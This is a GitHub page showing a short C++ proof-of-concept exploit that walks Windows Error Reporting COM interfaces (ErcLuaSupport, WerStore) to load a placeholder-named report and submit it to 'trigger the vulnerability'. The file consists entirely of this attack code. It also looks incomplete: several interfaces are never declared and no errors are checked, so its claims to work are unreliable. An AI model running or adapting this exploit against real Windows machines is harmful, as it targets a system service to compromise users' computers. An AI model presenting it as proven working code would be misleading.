-
Notifications
You must be signed in to change notification settings - Fork 27
/
PoC.cpp
44 lines (33 loc) · 1.55 KB
/
PoC.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
#include <Windows.h>
#include <iostream>
int main() {
// Initialize COM by calling CoInitialize(NULL).
CoInitialize(NULL);
// Create COM interfaces for interacting with WER:
IWerReport* pIWerReport = nullptr;
IErcLuaSupport* pIErcLuaSupport = nullptr;
IWerStoreFactory* pIWerStoreFactory = nullptr;
IWerStore* pIWerStore = nullptr;
// Create an instance of CLSID_ERCLuaSupport to get an IErcLuaSupport interface.
CoCreateInstance(CLSID_ERCLuaSupport, NULL, CLSCTX_LOCAL_SERVER, IID_IErcLuaSupport, (PVOID*)&pIErcLuaSupport);
// Use IErcLuaSupport to create an IWerStoreFactory instance.
pIErcLuaSupport->CoCreateIWerStoreFactory(&pIWerStoreFactory);
// Create an IWerStore instance using IWerStoreFactory.
pIWerStoreFactory->CoCreateIWerStore(&pIWerStore);
// Exploit steps
// Enumerate and start the report retrieval process by calling pIWerStore->EnumerateStart().
pIWerStore->EnumerateStart();
// Load a report using the pIWerStore->LoadReport function. Replace "ReportName" with the actual report name you want to exploit.
pIWerStore->LoadReport(L"ReportName", &pIWerReport);
// Submit the loaded report to trigger the vulnerability by calling pIWerReport->SubmitReport().
pIWerReport->SubmitReport();
// Clean up
// Release the COM interfaces and clean up the resources.
pIWerReport->Release();
pIWerStore->Release();
pIWerStoreFactory->Release();
pIErcLuaSupport->Release();
// Uninitialize COM by calling CoUninitialize().
CoUninitialize();
return 0;
}